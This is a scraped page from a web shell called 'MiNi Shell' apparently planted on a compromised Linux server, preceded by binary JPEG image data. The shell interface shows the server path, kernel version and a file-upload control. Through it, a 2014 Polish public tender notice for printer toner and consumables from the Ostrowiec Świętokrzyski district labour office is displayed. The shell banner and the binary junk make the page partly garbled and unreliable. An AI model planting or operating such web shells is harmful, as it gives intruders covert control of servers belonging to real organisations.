JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140217/31119-N-2014.html

<p class="kh_header"><b>Ostrowiec Świętokrzyski: Przetarg nieograniczony na sukcesywną dostawę materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, telefaksu i kopiarki w 2014 r. dla potrzeb Powiatowego Urzędu Pracy w Ostrowcu Świętokrzyskim.</b><br>
<b>Numer ogłoszenia: 31119 - 2014; data zamieszczenia: 17.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Ostrowcu Świętokrzyskim , al. 3 Maja 36, 27-400 Ostrowiec Świętokrzyski, woj. świętokrzyskie, tel. 0-41 26-54-208(09), faks 0-41 263-33-40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.ostrowiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na sukcesywną dostawę materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, telefaksu i kopiarki w 2014 r. dla potrzeb Powiatowego Urzędu Pracy w Ostrowcu Świętokrzyskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie dotyczy dostawy materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, telefaksu i kopiarki:
Ilości wskazane w tabeli są wielkościami orientacyjnymi ustalonymi na podstawie zużycia przez okres ostatnich 12 miesięcy oraz przewidywanego zapotrzebowania, przyjętymi dla celu porównania ofert i wyboru najkorzystniejszej oferty. Zamawiający zastrzega sobie prawo dokonania zmiany ilości przedmiotu zamówienia wyszczególnionego co do rodzaju w załączniku nr 1 do SIWZ, a także ograniczenia przedmiotu umowy, ze względu na potrzeby, których nie jest w stanie przewidzieć w chwili zawarcia umowy.

L.p.	Nazwa drukarki	Opis	
Kolor	Ilość sztuk
1	HP Color LaserJet CM2320	CC530A (oryginał) *	czarny	13
2	HP Color LaserJet CM2320	CC532A (oryginał) *	żółty	8
3	HP Color LaserJet CM2320	CC533A (oryginał) *	czerwony	8
4	HP Color LaserJet CM2320	CC531A (oryginał) *	niebieski	6
5	HP Color LaserJet 2820	Q3960A (oryginał) *	czarny	4
6	HP Color LaserJet 2820	Q3962A (oryginał) *	żółty	2
7	HP Color LaserJet 2820	Q3964A (oryginał) *	bęben	1
8	HP LaserJet P3005, M3027	51X (oryginał) *	czarny	5
9	Konica Minolta Bizhub 283	TN-217 (oryginał) *	czarny	3
10	Konica Minolta Bizhub C35	Black (oryginał) *	czarny	5
11	Konica Minolta Bizhub C35	Yellow (oryginał) *	żółty	2
12	Konica Minolta Bizhub C35	Magenta (oryginał) *	czerwony	2
13	Konica Minolta Bizhub C35	Cyan (oryginał) *	niebieski	2
14	Konica Minolta Bizhub C35	bęben unit (oryginał) *	czarny	2
15	Konica Minolta Bizhub C35	bęben unit (oryginał) *	żółty	2
16	Konica Minolta Bizhub C35	bęben unit (oryginał) *	czerwony	2
17	Konica Minolta Bizhub C35	bęben unit (oryginał) *	niebieski	2
18	Konica Minolta Bizhub C35	pojemnik 
WB-P03(oryginał) * 	pojemnik	3
19	Panasonic KX-MC6020PD	kx-fatk509e (oryginał) *	czarny	2
20	
Panasonic  KX-MC6020PD	fx-fadc510e
bęben światłoczuły (oryginał) * 	bęben światłoczuły	1
21	OKI B2540 MFP	9004447 (oryginał) *	czarny	4
22	HP LaserJet  1320, 3390	49x (oryginał) *	czarny	7
23	HP LaserJet  2015dn	53x 53a (oryginał) *	czarny	3
24	HP LaserJet   3015D	55x (oryginał) *	czarny	8
25	HP LaserJet  1022	12a (oryginał) *	czarny	12
26	Sharp AR 5320	AR-016T (oryginał) *	czarny	1
27	OKI C5850 	43865724 (oryginał) *	czarny	2
28	OKI C5850	43865722 (oryginał) *	czerwony	1
29	OKI C5850	43870024 (oryginał) *	czarny bęben	1
30	OKI C5850	43870023 (oryginał) *	niebieski bęben	1
31	OKI C5850	43870021 (oryginał) *	żółty bęben	1
32	OKI C5850	43870022 (oryginał) *	czerwony bęben	1
33	OKI C5850	43853103 (oryginał) *	fuzer	1
34	OKI Microline 3320	ML-320 (oryginał) *	kaseta z taśmą barwiącą czarną OKI	1
35	Konica Minolta Pagepro 4650EN	AOFN021 (oryginał) *	czarny	3
36	Kyocera FS-4300DN	TK-3130 (oryginał) *	czarny	2
37	Kyocera FS-4300DN	TK-3100 (oryginał) *	czarny	3
38	Kyocera FS-3040MFP+	TK-350 (oryginał) *	czarny	6
okres gwarancji	minimum 12 miesięcy

lub równoważne*
Opis przedmiotu zamówienia.
1)	Niniejsze zamówienie dotyczy dostawy materiałów eksploatacyjnych zgodnie ze szczegółowym opisem przedmiotu zamówienia, który stanowi - Załącznik nr 1 do SIWZ, 

2)	Wspólny Słownik Zamówień CPV:
		30125100-2 - wkłady barwiące
		30192113-6 - wkłady drukujące
		30192300-4 - taśmy barwiące
		30192112-9 - głowice barwiące do maszyn drukujących
3)	Wszystkie materiały eksploatacyjne - Załącznik nr 1 muszą być oryginalne i fabrycznie nowe. Pod pojęciem (fabrycznie nowe) Zamawiający rozumie produkty wykonane z nowych elementów tzn. nowa obudowa, nowe dysze, nowy tusz, nowe bębny światłoczułe, wcześniej nie używanych, nie regenerowanych ani nie prefabrykowanych, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta z oznaczonym logo, symbolem produktu i terminem przydatności do użytku, wskazującym typ i model urządzenia, do którego są przeznaczone, oraz nazwę producenta - odpowiednio do wymagań dla danego rodzaju materiału.
4)	Za produkt fabrycznie nowy (nowo wytworzony w całości) i nie regenerowany nie uznaje się wyrobu eksploatowanego wcześniej, przerabianego, gdzie jedynie wyczyszczony został pojemnik i ponownie napełniony czy uzupełniony lub wykonany z zastosowaniem używanych elementów.
5)	Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, eksploatacyjnych i użytkowych. Jednocześnie Zamawiający przypomina, że zgodnie z art. 30 ust. 5 ustawy Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowana przez niego dostawa spełnia wymagania określone przez Zamawiającego. 
6)	W przypadku gdy informacje zawarte w załączonych przez Wykonawcę opisach nie potwierdzą zgodności przedmiotu zamówienia z wymaganiami zamawiającego lub gdy Wykonawca nie załączy wymaganych dokumentów stwierdzających równoważność, oferta Wykonawcy zostanie odrzucona.
7)	Każdy oferowany produkt musi być kompatybilny ze sprzętem, do którego jest zamówiony, 
o parametrach takich samych lub lepszych ( pojemność produktu, wydajność i jakość wydruku) 
w stosunku do typu zamawianego produktu fabrycznie nowego, nie regenerowanego, pochodzącego od producenta urządzenia, do którego materiał eksploatacyjny jest przeznaczony.
8)	Materiały równoważne muszą być wyposażone w występujące w materiałach oryginalnych elementy elektroniczne (chipy) spełniające wymogi producenta urządzeń, w którym mają być stosowane i nie mogą ograniczać pełnej współpracy z oprogramowaniem urządzeń drukujących, monitorującym stan zasobników z tuszem lub tonerem i)lub materiału eksploatacyjnego.
9)	Materiały równoważne nie mogą powodować ograniczeń funkcji i możliwości sprzętu drukującego, do którego są przeznaczone oraz wpływać ujemnie na jakość wydruku, wyspecyfikowaną w warunkach technicznych określonych przez producenta sprzętu.
10)	Na opakowaniach muszą być wypisane wszystkie typy drukarek, urządzeń wielofunkcyjnych,  	kserokopiarek, telefaksów itd., z którymi dany materiał eksploatacyjny jest kompatybilny, czyli 	dopuszczony do stosowania.
11)	Wkłady drukujące (tonery, bębny, tusze itd.) muszą zawierać na obudowie)naboju informację 	umożliwiającą ich identyfikację. W przypadku materiałów równoważnych, gdy kod identyfikacyjny 	jest inny od kodu stosowanego przez producenta materiałów oryginalnych i nie zawiera opisu umożliwiającego jego łatwą identyfikację, Wykonawca zobowiązany jest dołączyć do oferty wykaz kodów producenta)ów zamienników wraz z informacją do jakich drukarek, urządzeń wielofunkcyjnych, itd., dany model jest dedykowany.
12)	Wszystkie oferowane materiały eksploatacyjne, niezależnie od tego, czy są to produkty oryginalne czy równoważne muszą być wyprodukowane nie wcześniej, niż 3 miesiące przed terminem dostawy. Na wszystkich oferowanych materiałach eksploatacyjnych musi być fabryczne oznaczenie daty produkcji.
13)	W przypadku uszkodzenia urządzenia Zamawiającego na skutek wadliwego działania dostarczonego przez Wykonawcę materiału eksploatacyjnego, Wykonawca zobowiązany jest do naprawy urządzenia w autoryzowanym serwisie producenta sprzętu na własny koszt, 
w nieprzekraczalnym terminie 7 dni roboczych od daty zgłoszenia awarii.
14)	Wszystkie oferowane artykuły, jeżeli tego wymagają odpowiednie przepisy prawa, muszą posiadać stosowne atesty lub certyfikaty w zakresie bezpieczeństwa i dopuszczenia do obrotu handlowego.
15)	Użycie przez Zamawiającego materiałów eksploatacyjnych do sprzętu wymienionego w Załączniku nr 1 do SIWZ (sprzęt na gwarancji) zaoferowanych przez Wykonawcę nie może powodować utraty gwarancji producenta drukarek; wymóg stosowania materiałów eksploatacyjnych zalecanych przez producenta.
16)	Zamawiający wymaga udzielenia przez Wykonawcę gwarancji na oferowane materiały eksploatacyjne na okres minimum 12 miesięcy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 7 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.19.21.13-6, 30.19.23.00-4, 30.19.21.12-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstąpił od wnoszenia wadium przez Wykonawców zgodnie z art. 45 ust. 2 ustawy Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca)y złoży oświadczenie w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Ocena spełnienia ww. warunków dokonana zostanie wg zastosowania formuły: spełnia- nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca)y złoży oświadczenie w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Ocena spełnienia ww. warunków dokonana zostanie wg zastosowania formuły: spełnia- nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca)y złoży oświadczenie w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Ocena spełnienia ww. warunków dokonana zostanie wg zastosowania formuły: spełnia- nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca)y złoży oświadczenie w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Ocena spełnienia ww. warunków dokonana zostanie wg zastosowania formuły: spełnia- nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w niniejszej specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca)y złoży oświadczenie w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Ocena spełnienia ww. warunków dokonana zostanie wg zastosowania formuły: spełnia- nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w niniejszej specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony Formularz ofertowy- załącznik nr 2
2) Zaakceptowany wzór umowy - załącznik nr 5</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Rodzaj oferowanych materiałów eksploatacyjnych - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza zmianę postanowień niniejszej umowy, w przypadku: 
a)	wycofania z dystrybucji przedmiotu umowy, wymienionego w Formularzu ofertowym będącym załącznikiem do niniejszej umowy i zastąpienia go produktem o parametrach nie gorszych niż oferowany, za cenę taką jak ustalona w umowie,
b)	zmiany terminu dostawy z przyczyn niezależnych od Wykonawcy.
c)	ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.ostrowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Ostrowcu Świętokrzyskim, Aleja 3 Maja 36, 27-400 Ostrowiec Świętokrzyski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2014 godzina 10:00, miejsce: Zamkniętą kopertę zawierającą ofertę należy przesłać lub złożyć w siedzibie Zamawiającego przy Alei 3 Maja 36, 27-400 Ostrowiec Św., pok. 40 (Sekretariat) - II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com